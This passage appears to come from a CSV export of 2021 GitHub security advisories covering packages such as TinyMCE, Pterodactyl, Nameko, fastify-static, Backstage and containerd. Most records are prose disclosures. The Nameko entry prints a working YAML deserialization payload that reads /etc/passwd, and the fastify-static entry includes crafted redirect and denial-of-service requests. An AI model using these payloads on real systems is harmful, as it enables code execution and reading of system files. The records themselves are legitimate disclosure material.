'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'forkcms/forkcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23049'}, {'type': 'WEB', 'url': 'https://github.com/forkcms/forkcms/commit/6ec6171206a7507a39695edc8bbd1b97ef1041c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/forkcms/forkcms'}, {'type': 'WEB', 'url': 'https://www.vulnerability-lab.com/get_content.php?id=2208'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:26:04Z', 'nvd_published_at': '2021-10-22T20:15:00Z'}" +1.4.0,GHSA-5h9g-x5rv-25wg,2021-10-22T13:49:23Z,2021-10-22T16:24:02Z,,[],Cross-site scripting vulnerability in TinyMCE,"### Impact +A cross-site scripting (XSS) vulnerability was discovered in the schema validation logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or editor APIs. This malicious content could then end up in content published outside the editor, if no server-side sanitization was performed. This impacts all users who are using TinyMCE 5.8.2 or lower. + +### Patches +This vulnerability has been patched in TinyMCE 5.9.0 by ensuring schema validation was still performed after unwrapping invalid elements. + +### Workarounds +To work around this vulnerability, either: +- Upgrade to TinyMCE 5.9.0 or higher +- Manually sanitize the content using the `BeforeSetContent` event (see below) + +#### Example: Manually sanitize content +```js +editor.on('BeforeSetContent', function(e) { + var sanitizedContent = ...; // Manually sanitize content here + e.content = sanitizedContent; +}); +``` + +### Acknowledgements +Tiny Technologies would like to thank William Bowling for discovering this vulnerability. + +### References +https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes + +### For more information +If you have any questions or comments about this advisory: +* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud) +* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'TinyMCE'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tinymce/tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-5h9g-x5rv-25wg'}, {'type': 'PACKAGE', 'url': 'https://github.com/tinymce/tinymce'}, {'type': 'WEB', 'url': 'https://www.tiny.cloud/docs/release-notes/release-notes59/#securityfixes'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T13:49:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-r838-q6jp-58xx,2021-10-08T23:00:17Z,2021-10-12T16:31:22Z,,['CVE-2013-1895'],Improper Restriction of Excessive Authentication Attempts in py-bcrypt,"The py-bcrypt module before 0.3 for Python does not properly handle concurrent memory access, which allows attackers to bypass authentication via multiple authentication requests, which trigger the password hash to be overwritten.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'py-bcrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-1895'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/83039'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101382.html'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101387.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/03/26/2'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/58702'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:00:17Z', 'nvd_published_at': '2020-01-28T15:15:00Z'}" +1.4.0,GHSA-m49f-hcxp-6hm6,2023-09-20T19:07:20Z,2021-10-25T19:42:46Z,,['CVE-2021-41176'],pterodactyl/panel CSRF allowing an external page to trigger a user logout event,"### Impact +A malicious user can trigger a user logout if a signed in user visits a malicious website that makes a request to the Panel's sign-out endpoint. This requires a targeted attack against a specific Panel instance, and serves only to sign a user out. **No user details are leaked, nor is any user data affected, this is simply an annoyance at worst.** + +### Patches +None. + +### Workarounds +None. + +### For more information +If you have any questions or comments about this advisory please contact `Tactical Fish#8008` on Discord, or email `dane@pterodactyl.io`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-m49f-hcxp-6hm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41176'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/45999ba4ee1b2dcb12b4a2fa2cedfb6b5d66fac2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/releases/tag/v1.6.3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T16:51:25Z', 'nvd_published_at': '2021-10-25T17:15:00Z'}" +1.4.0,GHSA-grh7-935j-hg6w,2023-01-24T15:03:47Z,2021-10-06T17:47:17Z,,['CVE-2021-30151'],Cross-site Scripting in Sidekiq,Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'sidekiq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'sidekiq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30151'}, {'type': 'WEB', 'url': 'https://github.com/mperham/sidekiq/issues/4852'}, {'type': 'WEB', 'url': 'https://github.com/mperham/sidekiq/commit/64f70339d1dcf50a55c00d36bfdb61d97ec63ed8'}, {'type': 'PACKAGE', 'url': 'https://github.com/mperham/sidekiq'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:52:11Z', 'nvd_published_at': '2021-04-06T06:15:00Z'}" +1.4.0,GHSA-jfmf-w293-8xr8,2021-10-13T17:43:34Z,2021-10-13T18:55:52Z,,[],Regular expression Denial of Service (ReDoS) in EmailValidator class in V7 compatibility module in Vaadin 8,Unsafe validation RegEx in `EmailValidator` component in `com.vaadin:vaadin-compatibility-server` versions 8.0.0 through 8.12.4 (Vaadin versions 8.0.0 through 8.12.4) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.13.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.12.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-jfmf-w293-8xr8'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/framework'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31409'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:43:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-3w73-fmf3-hg5c,2022-02-23T22:19:32Z,2021-10-19T20:15:50Z,,['CVE-2021-42575'],Policies not properly enforced in OWASP Java HTML Sanitizer,"The OWASP Java HTML Sanitizer before 20211018.1 does not properly enforce policies associated with the `SELECT`, `STYLE`, and `OPTION` elements.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20211018.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42575'}, {'type': 'WEB', 'url': 'https://docs.google.com/document/d/11SoX296sMS0XoQiQbpxc5pNxSdbJKDJkm5BDv0zrX50/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T16:10:40Z', 'nvd_published_at': '2021-10-18T15:15:00Z'}" +1.4.0,GHSA-5vfx-8w6m-h3v4,2022-08-15T20:12:39Z,2021-10-04T20:14:13Z,,['CVE-2021-41129'],Pterodactyl Panel vulnerable to authentication bypass due to improper user-provided security token verification,"A malicious user can modify the contents of a `confirmation_token` input during the two-factor authentication process to reference a cache value not associated with the login attempt. In rare cases this can allow a malicious actor to authenticate as a random user in the Panel. The malicious user must target an account with two-factor authentication enabled, and then must provide a correct two-factor authentication token before being authenticated as that user. + +## Impact +Due to a validation flaw in the logic handling user authentication during the two-factor authentication process a malicious user can trick the system into loading credentials for an arbitrary user by modifying the token sent to the server. This authentication flaw is present in the `LoginCheckpointController@__invoke` method which handles two-factor authentication for a user. + +This controller looks for a request input parameter called `confirmation_token` which is expected to be a 64 character random alpha-numeric string that references a value within the Panel's cache containing a `user_id` value. This value is then used to fetch the user that attempted to login, and lookup their two-factor authentication token. Due to the design of this system, any element in the cache that contains only digits could be referenced by a malicious user, and whatever value is stored at that position would be used as the `user_id`. + +There are a few different areas of the Panel that store values into the cache that are integers, and a user who determines what those cache keys are could pass one of those keys which would cause this code pathway to reference an arbitrary user. + +## Scope +At its heart this is a high-risk login bypass vulnerability. However, there are a few additional conditions that must be met in order for this to be successfully executed, notably: + +1.) The account referenced by the malicious cache key **must** have two-factor authentication enabled. An account without two-factor authentication would cause an exception to be triggered by the authentication logic, thusly exiting this authentication flow. +2.) Even if the malicious user is able to reference a valid cache key that references a valid user account with two-factor authentication, they **must** provide a valid two-factor authentication token. + +However, due to the design of this endpoint once a valid user account is found with two-factor authentication enabled there is no rate-limiting present, thusly allowing an attacker to brute force combinations until successful. This leads to a third condition that must be met: + +3.) For the duration of this attack sequence the cache key being referenced must continue to exist with a valid `user_id` value. Depending on the specific key being used for this attack, this value may disappear quickly, or be changed by other random user interactions on the Panel, outside the control of the attacker. + +### About the Severity +As you may have noticed, this is not a trivial authentication bypass bug to exploit, and is likely incredibly difficult for a layperson to pull off. However, the severity of this disclosure has been prepared based on the nature of the bug and the potential for unexpected administrative account access under very rare conditions. + +## Mitigation +In order to mitigate this vulnerability the underlying authentication logic was changed to use an encrypted session store that the user is therefore unable to control the value of. This completely removed the use of a user-controlled value being used. In addition, the code was audited to ensure this type of vulnerability is not present elsewhere. + +If you have any questions or concerns about the content of this disclosure please contact `Tactical Fish#8008` on Discord, or email `dane ät pterodactyl.io`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-5vfx-8w6m-h3v4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41129'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/4a84c36009be10dbd83051ac1771662c056e4977'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/blob/v1.6.2/CHANGELOG.md#v162'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/releases/tag/v1.6.2'}]","{'cwe_ids': ['CWE-287', 'CWE-502', 'CWE-639', 'CWE-807'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T16:51:31Z', 'nvd_published_at': '2021-10-06T20:15:00Z'}" +1.4.0,GHSA-5f38-9jw2-6r6h,2022-05-04T03:42:48Z,2021-10-12T16:22:04Z,,['CVE-2021-23447'],Cross-site Scripting in teddy,Teddy is a readable and easy to learn templating language. This affects the package teddy before 0.5.9. A type confusion vulnerability can be used to bypass input sanitization when the model content is an array (instead of a string).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'teddy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23447'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/pull/518'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/commit/64c556717b4879bf8d4c30067cf6e70d899a3dc0'}, {'type': 'PACKAGE', 'url': 'https://github.com/rooseveltframework/teddy'}, {'type': 'WEB', 'url': 'https://github.com/rooseveltframework/teddy/releases/tag/0.5.9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TEDDY-1579557'}]","{'cwe_ids': ['CWE-79', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:52:26Z', 'nvd_published_at': '2021-10-07T17:15:00Z'}" +1.4.0,GHSA-3448-vrgh-85xr,2021-11-18T15:27:30Z,2021-10-12T22:21:43Z,,['CVE-2019-14493'],NULL Pointer Dereference in OpenCV.,An issue was discovered in OpenCV before 4.1.1 (OpenCV-Python before 4.1.1.26). There is a NULL pointer dereference in the function cv::XMLParser::parse at modules/core/src/persistence.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14493'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15127'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T14:48:09Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}" +1.4.0,GHSA-284f-f2hw-j2gx,2021-10-18T18:15:50Z,2021-10-12T18:41:59Z,,['CVE-2021-22958'],Server-Side Request Forgery vulnerability in concrete5,A Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost allowing interaction with local services. Impact can vary depending on services exposed.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22958'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/pull/8826'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/863221'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/855-release-notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/concrete5/concrete5'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:44:32Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}" +1.4.0,GHSA-6p52-jr3q-c94g,2023-09-01T21:39:22Z,2021-10-19T15:28:57Z,,['CVE-2021-41078'],Nameko Arbitrary code execution due to YAML deserialization,"### Impact + +Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example: + +``` yaml +# malicious.yaml +!!python/object/new:type +args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] +listitems: ""__import__('os').system('cat /etc/passwd')"" +``` + +``` shell +$ nameko run --config malicious.yaml test +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +... +``` + +### Patches + +The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release. + +Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable. + +### Workarounds + +The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nameko'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.14.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nameko'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0rc0'}, {'fixed': '3.0.0rc10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0rc9'}}]","[{'type': 'WEB', 'url': 'https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41078'}, {'type': 'PACKAGE', 'url': 'https://github.com/nameko/nameko'}, {'type': 'WEB', 'url': 'https://github.com/nameko/nameko/releases/tag/v2.14.0'}, {'type': 'WEB', 'url': 'https://github.com/nameko/nameko/releases/tag/v3.0.0-rc10'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T15:14:24Z', 'nvd_published_at': '2021-10-26T13:15:00Z'}" +1.4.0,GHSA-pgh6-m65r-2rhq,2021-10-21T14:57:14Z,2021-10-12T16:04:17Z,,['CVE-2021-22964'],DOS and Open Redirect with user input,"### Impact + +A redirect vulnerability in the `fastify-static` module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash `//` followed by a domain: `http://localhost:3000//a//youtube.com/%2e%2e%2f%2e%2e`. + +A DOS vulnerability is possible if the URL contains invalid characters `curl --path-as-is ""http://localhost:3000//^/..""` + +The issue shows up on all the `fastify-static` applications that set `redirect: true` option. By default, it is `false`. + +### Patches +The issue has been patched in `fastify-static@4.4.1` + +### Workarounds +If updating is not an option, you can sanitize the input URLs using the [`rewriteUrl`](https://www.fastify.io/docs/latest/Server/#rewriteurl) server option. + +### References + ++ Bug founder: drstrnegth ++ [hackerone Report](https://hackerone.com/reports/1361804) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [fastify-static](https://github.com/fastify/fastify-static) +* Contact the [security team](https://github.com/fastify/fastify/blob/main/SECURITY.md#the-fastify-security-team) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.4'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/security/advisories/GHSA-pgh6-m65r-2rhq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22964'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/commit/c31f17d107cb19a0e96733c80a9abf16c56166d4'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1361804'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-static'}]","{'cwe_ids': ['CWE-248', 'CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:38:24Z', 'nvd_published_at': '2021-10-14T15:15:00Z'}" +1.4.0,GHSA-m6m5-pp4g-fcc8,2021-10-06T16:48:49Z,2021-10-06T17:47:35Z,,[],S3 storage write is not aborted on errors leading to unbounded memory usage,"### Impact + +Anyone using storage.blob.s3 introduced in 0.5.0 with storage.imapsql. +``` +storage.imapsql local_mailboxes { + ... + msg_store s3 { + ... + } +} +``` + +### Patches + +The relevant commit is pushed to master and will be included in the 0.5.1 release. + +No special handling of the issue has been done due to the small amount of affected users. + +### Workarounds + +None. + +### References + +* Original report: https://github.com/foxcpp/maddy/issues/395 +* Fix: https://github.com/foxcpp/maddy/commit/07c8495ee4394fabbf5aac4df8aebeafb2fb29d8","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/foxcpp/maddy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/security/advisories/GHSA-m6m5-pp4g-fcc8'}, {'type': 'PACKAGE', 'url': 'https://github.com/foxcpp/maddy'}]","{'cwe_ids': ['CWE-772'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:48:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-pvv8-8fx9-h673,2021-10-25T20:07:48Z,2021-10-19T15:28:03Z,,['CVE-2021-41151'],Path Traversal in @backstage/plugin-scaffolder-backend ,"### Impact + +A malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a `publish:github:pull-request` action using a particular source path. When the template is executed the sensitive files would be included in the published pull request. + +This vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request. + +### Patches + +The vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-scaffolder-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.4'}, {'fixed': '0.15.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41151'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/6968962c920508eae19a4c1c200fa2c8980a4006'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/releases/tag/release-2021-10-16'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-18T20:47:02Z', 'nvd_published_at': '2021-10-18T21:15:00Z'}" +1.4.0,GHSA-m6j4-8r7p-wpp3,2021-10-06T16:57:01Z,2021-10-06T17:46:55Z,,['CVE-2021-21389'],BuddyPress privilege escalation via REST API,"### Impact +It's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the BuddyPress REST API members endpoint. + +### Patches +The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue. + +### References +https://buddypress.org/2021/03/buddypress-7-2-1-security-release/ + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [HackerOne](https://hackerone.com/wordpress)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'buddypress/buddypress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21389'}, {'type': 'WEB', 'url': 'https://buddypress.org/2021/03/buddypress-7-2-1-security-release/'}, {'type': 'WEB', 'url': 'https://codex.buddypress.org/releases/version-7-2-1/'}, {'type': 'PACKAGE', 'url': 'https://github.com/buddypress/BuddyPress'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:57:01Z', 'nvd_published_at': '2021-03-26T21:15:00Z'}" +1.4.0,GHSA-c2h3-6mxw-7mvq,2021-10-15T17:31:03Z,2021-10-04T20:14:47Z,,['CVE-2021-41103'],Insufficiently restricted permissions on plugin directories,"### Impact +A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. + +### Patches +This vulnerability has been fixed in containerd 1.4.11 and containerd 1.5.7. Users should update to these version when they are released and may restart containers or update directory permissions to mitigate the vulnerability. + +### Workarounds +Limit access to the host to trusted users. Update directory permission on container bundles directories. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [github.com/containerd/containerd](https://github.com/containerd/containerd/issues/new/choose) +* Email us at [security@containerd.io](mailto:security@containerd.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41103'}, {'type': 'WEB', 'url': 